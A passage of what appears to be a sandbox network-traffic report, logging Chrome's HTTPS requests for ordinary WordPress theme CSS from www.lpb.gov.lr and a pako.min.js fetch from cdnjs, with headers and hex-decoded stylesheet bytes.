                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 30 70 78 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 7d 40 2d 6d 6f 7a 2d 6b 65 79 66 72 61 6d 65 73 20 7a 6f 6f 6d 49 6e 52 69 67 68 74 4c 61 72 67 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 30 70 78 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 7d 40 2d 6d 73 2d 6b 65 79 66 72 61
                                                                                                                        Data Ascii: ebkit-transform:scale(0) translateX(1000px)}100%{opacity:1;-webkit-transform:scale(1) translateX(0)}}@-moz-keyframes zoomInRightLarge{0%{opacity:0;-moz-transform:scale(0) translateX(1000px)}100%{opacity:1;-moz-transform:scale(1) translateX(0)}}@-ms-keyfra
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 28 31 29 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 30 70 78 29 7d 7d 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 7a 6f 6f 6d 4f 75 74 52 69 67 68 74 4c 61 72 67 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 30 70 78 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 7a 6f 6f 6d 4f 75 74 52 69 67 68 74 4c 61 72 67 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61
                                                                                                                        Data Ascii: (1) translateX(1000px)}}@-o-keyframes zoomOutRightLarge{0%{opacity:0;-o-transform:scale(0) translateX(0)}100%{opacity:1;-o-transform:scale(1) translateX(1000px)}}@keyframes zoomOutRightLarge{0%{opacity:0;transform:scale(0) translateX(0)}100%{opacity:1;tra
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 7d 7d 2e 61 6e 69 6d 61 74 65 2e 62 6f 75 6e 63 65 4f 75 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 4f 75 74 3b 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 4f 75 74 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 4f 75 74 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 4f 75 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 4f 75
                                                                                                                        Data Ascii: :1;transform:scale(1.1)}50%{opacity:0;transform:scale(.9)}100%{opacity:0;transform:scale(0)}}.animate.bounceOut{-webkit-animation-name:bounceOut;-moz-animation-name:bounceOut;-ms-animation-name:bounceOut;-o-animation-name:bounceOut;animation-name:bounceOu
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 67 65 72 2e 62 6f 75 6e 63 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 3b 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 62 6f 75 6e 63 65 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 74 61 64 61 7b 30 25 2c 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 72 6f 74 61 74 65 28 30 29 7d 31 30 25 2c 32 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 29 20 72 6f 74 61 74 65 28 2d 33
                                                                                                                        Data Ascii: ger.bounce{-webkit-animation-name:bounce;-moz-animation-name:bounce;-ms-animation-name:bounce;-o-animation-name:bounce;animation-name:bounce}@-webkit-keyframes tada{0%,100%{-webkit-transform:scale(1) rotate(0)}10%,20%{-webkit-transform:scale(.9) rotate(-3
                                                                                                                        2025-01-10 13:54:45 UTC3623INData Raw: 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 75 6c 73 61 74 65 7b 30 25 2c 31 30 30 25 2c 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 32 35 25 2c 37 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 31 29 7d 7d 2e 68 6f 76 65 72 2d 70 75 6c 73 61 74 65 3a 68 6f 76 65 72 2c 2e 74 72 69 67 67 65 72 2e 70 75 6c 73 61 74 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 70 75 6c 73 61 74 65 3b 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 70 75 6c 73 61 74 65 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 70 75 6c 73 61 74 65 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 70 75 6c 73 61 74 65 3b 61
                                                                                                                        Data Ascii: o-transform:scale(1.1)}}@keyframes pulsate{0%,100%,50%{transform:scale(1)}25%,75%{transform:scale(1.1)}}.hover-pulsate:hover,.trigger.pulsate{-webkit-animation-name:pulsate;-moz-animation-name:pulsate;-ms-animation-name:pulsate;-o-animation-name:pulsate;a


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.74975769.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC597OUTGET /wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:45 UTC362INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:44 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "ed1d-60e9383bd07f8"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 60701
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:44 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:45 UTC7830INData Raw: 2f 2a 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 35 2e 31 35 2e 31 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 0a 2e 66 61 2c 2e 66 61 73 2c 2e 66 61 72 2c 2e 66 61 6c 2c 2e 66 61 64 2c 2e 66 61 62 7b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69
                                                                                                                        Data Ascii: /* * Font Awesome Free 5.15.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) */.fa,.fas,.far,.fal,.fad,.fab{-moz-osx-font-smoothing:grayscale;-webki
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 6e 74 3a 22 5c 66 33 37 61 22 7d 0a 2e 66 61 2d 62 6c 61 63 6b 2d 74 69 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 65 22 7d 0a 2e 66 61 2d 62 6c 61 63 6b 62 65 72 72 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 62 22 7d 0a 2e 66 61 2d 62 6c 65 6e 64 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 37 22 7d 0a 2e 66 61 2d 62 6c 65 6e 64 65 72 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 62 36 22 7d 0a 2e 66 61 2d 62 6c 69 6e 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 39 64 22 7d 0a 2e 66 61 2d 62 6c 6f 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 38 31 22 7d 0a 2e 66 61 2d 62 6c 6f 67 67 65 72 3a 62 65 66 6f 72 65 7b 63 6f
                                                                                                                        Data Ascii: nt:"\f37a"}.fa-black-tie:before{content:"\f27e"}.fa-blackberry:before{content:"\f37b"}.fa-blender:before{content:"\f517"}.fa-blender-phone:before{content:"\f6b6"}.fa-blind:before{content:"\f29d"}.fa-blog:before{content:"\f781"}.fa-blogger:before{co
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 72 65 61 74 69 76 65 2d 63 6f 6d 6d 6f 6e 73 2d 73 68 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 66 32 22 7d 0a 2e 66 61 2d 63 72 65 61 74 69 76 65 2d 63 6f 6d 6d 6f 6e 73 2d 7a 65 72 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 66 33 22 7d 0a 2e 66 61 2d 63 72 65 64 69 74 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 64 22 7d 0a 2e 66 61 2d 63 72 69 74 69 63 61 6c 2d 72 6f 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 63 39 22 7d 0a 2e 66 61 2d 63 72 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 32 35 22 7d 0a 2e 66 61 2d 63 72 6f 70 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 36 35 22 7d 0a 2e 66 61 2d 63 72 6f
                                                                                                                        Data Ascii: reative-commons-share:before{content:"\f4f2"}.fa-creative-commons-zero:before{content:"\f4f3"}.fa-credit-card:before{content:"\f09d"}.fa-critical-role:before{content:"\f6c9"}.fa-crop:before{content:"\f125"}.fa-crop-alt:before{content:"\f565"}.fa-cro
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 62 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 33 22 7d 0a 2e 66 61 2d 67 61 6c 61 63 74 69 63 2d 72 65 70 75 62 6c 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 30 63 22 7d 0a 2e 66 61 2d 67 61 6c 61 63 74 69 63 2d 73 65 6e 61 74 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 30 64 22 7d 0a 2e 66 61 2d 67 61 6d 65 70 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 62 22 7d 0a 2e 66 61 2d 67 61 73 2d 70 75 6d 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 32 66 22 7d 0a 2e 66 61 2d 67 61 76 65 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 33 22 7d 0a 2e 66 61 2d 67 65 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 61 35 22
                                                                                                                        Data Ascii: bol:before{content:"\f1e3"}.fa-galactic-republic:before{content:"\f50c"}.fa-galactic-senate:before{content:"\f50d"}.fa-gamepad:before{content:"\f11b"}.fa-gas-pump:before{content:"\f52f"}.fa-gavel:before{content:"\f0e3"}.fa-gem:before{content:"\f3a5"
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 72 2d 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 62 63 22 7d 0a 2e 66 61 2d 6b 69 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 39 36 22 7d 0a 2e 66 61 2d 6b 69 73 73 2d 62 65 61 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 39 37 22 7d 0a 2e 66 61 2d 6b 69 73 73 2d 77 69 6e 6b 2d 68 65 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 39 38 22 7d 0a 2e 66 61 2d 6b 69 77 69 2d 62 69 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 33 35 22 7d 0a 2e 66 61 2d 6b 6f 72 76 75 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 32 66 22 7d 0a 2e 66 61 2d 6c 61 6e 64 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 36 66 22 7d 0a 2e 66
                                                                                                                        Data Ascii: r-k:before{content:"\f3bc"}.fa-kiss:before{content:"\f596"}.fa-kiss-beam:before{content:"\f597"}.fa-kiss-wink-heart:before{content:"\f598"}.fa-kiwi-bird:before{content:"\f535"}.fa-korvue:before{content:"\f42f"}.fa-landmark:before{content:"\f66f"}.f
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 72 2d 70 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 61 37 22 7d 0a 2e 66 61 2d 70 69 65 64 2d 70 69 70 65 72 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 65 22 7d 0a 2e 66 61 2d 70 69 67 67 79 2d 62 61 6e 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 64 33 22 7d 0a 2e 66 61 2d 70 69 6c 6c 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 38 34 22 7d 0a 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 32 22 7d 0a 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 2d 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 33 31 22 7d 0a 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63
                                                                                                                        Data Ascii: r-pp:before{content:"\f1a7"}.fa-pied-piper-square:before{content:"\e01e"}.fa-piggy-bank:before{content:"\f4d3"}.fa-pills:before{content:"\f484"}.fa-pinterest:before{content:"\f0d2"}.fa-pinterest-p:before{content:"\f231"}.fa-pinterest-square:before{c
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 3a 22 5c 66 31 39 37 22 7d 0a 2e 66 61 2d 73 70 65 61 6b 61 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 66 33 22 7d 0a 2e 66 61 2d 73 70 65 61 6b 65 72 2d 64 65 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 33 63 22 7d 0a 2e 66 61 2d 73 70 65 6c 6c 2d 63 68 65 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 39 31 22 7d 0a 2e 66 61 2d 73 70 69 64 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 31 37 22 7d 0a 2e 66 61 2d 73 70 69 6e 6e 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 30 22 7d 0a 2e 66 61 2d 73 70 6c 6f 74 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 62 63 22 7d 0a 2e 66 61 2d 73 70 6f 74 69 66 79 3a 62 65 66 6f 72 65 7b 63 6f
                                                                                                                        Data Ascii: :"\f197"}.fa-speakap:before{content:"\f3f3"}.fa-speaker-deck:before{content:"\f83c"}.fa-spell-check:before{content:"\f891"}.fa-spider:before{content:"\f717"}.fa-spinner:before{content:"\f110"}.fa-splotch:before{content:"\f5bc"}.fa-spotify:before{co
                                                                                                                        2025-01-10 13:54:45 UTC4871INData Raw: 61 64 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 30 38 22 7d 0a 2e 66 61 2d 76 65 63 74 6f 72 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 63 62 22 7d 0a 2e 66 61 2d 76 65 6e 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 31 22 7d 0a 2e 66 61 2d 76 65 6e 75 73 2d 64 6f 75 62 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 36 22 7d 0a 2e 66 61 2d 76 65 6e 75 73 2d 6d 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 38 22 7d 0a 2e 66 61 2d 76 65 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 35 22 7d 0a 2e 66 61 2d 76 65 73 74 2d 70 61 74 63 68 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38
                                                                                                                        Data Ascii: adin:before{content:"\f408"}.fa-vector-square:before{content:"\f5cb"}.fa-venus:before{content:"\f221"}.fa-venus-double:before{content:"\f226"}.fa-venus-mars:before{content:"\f228"}.fa-vest:before{content:"\e085"}.fa-vest-patches:before{content:"\e08


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        10192.168.2.74976169.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC610OUTGET /wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.min.css?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:45 UTC361INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:45 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "25ef-60e9383bc7b56"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 9711
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:45 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:45 UTC7831INData Raw: 64 69 76 2e 6a 70 2d 61 75 64 69 6f 2c 64 69 76 2e 6a 70 2d 61 75 64 69 6f 2d 73 74 72 65 61 6d 2c 64 69 76 2e 6a 70 2d 76 69 64 65 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 38 66 38 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 36 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 64 69 76 2e 6a 70 2d 76 69 64 65 6f 2d 66 75 6c 6c 7b 68 65 69 67 68 74 3a 32 37 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 7d 64 69 76 2e 6a 70 2d 76 69 64 65 6f 2d 66 75 6c 6c
                                                                                                                        Data Ascii: div.jp-audio,div.jp-audio-stream,div.jp-video{background-color:#f8f8f8;color:#666;font-family:Verdana,Arial,sans-serif;font-size:1.25em;line-height:1.6;position:relative}div.jp-video-full{height:270px;position:static!important;width:100%}div.jp-video-full
                                                                                                                        2025-01-10 13:54:45 UTC1880INData Raw: 65 72 2e 62 6c 75 65 2e 6d 6f 6e 64 61 79 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 20 2d 32 37 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 7d 61 2e 6a 70 2d 73 68 75 66 66 6c 65 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 6a 70 6c 61 79 65 72 2e 62 6c 75 65 2e 6d 6f 6e 64 61 79 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 2d 33 30 70 78 20 2d 32 37 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 7d 61 2e 6a 70 2d 73 68 75 66 66 6c 65 2d 6f 66 66 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 6a 70 6c 61 79 65 72 2e 62 6c 75 65 2e 6d 6f 6e 64 61 79 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 2d 36
                                                                                                                        Data Ascii: er.blue.monday.jpg) no-repeat scroll 0 -270px rgba(0,0,0,0);margin-left:5px}a.jp-shuffle:hover{background:url(jplayer.blue.monday.jpg) no-repeat scroll -30px -270px rgba(0,0,0,0)}a.jp-shuffle-off{background:url(jplayer.blue.monday.jpg) no-repeat scroll -6


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        11192.168.2.749768104.17.25.144432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:45 UTC376OUTGET /ajax/libs/pako/2.0.4/pako.min.js HTTP/1.1
                                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:45 UTC953INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:45 GMT
                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                                        ETag: W/"6102d866-36c3"
                                                                                                                        Last-Modified: Thu, 29 Jul 2021 16:33:42 GMT
                                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Timing-Allow-Origin: *
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 1
                                                                                                                        Expires: Wed, 31 Dec 2025 13:54:45 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbBbCqrmMUkpT4nFkg8S14yQXpiHPCf9%2BkDvNyMVTxKpxGtMIYI%2Fed36dMl7EysJnbbDtzFXihyhO3Ow3zAY44xWHTe%2FFWuijdulHseXvJfUcYsdsybGAQDNXiNQC98xr9siDeFw"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8ffd292a7f0d436d-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
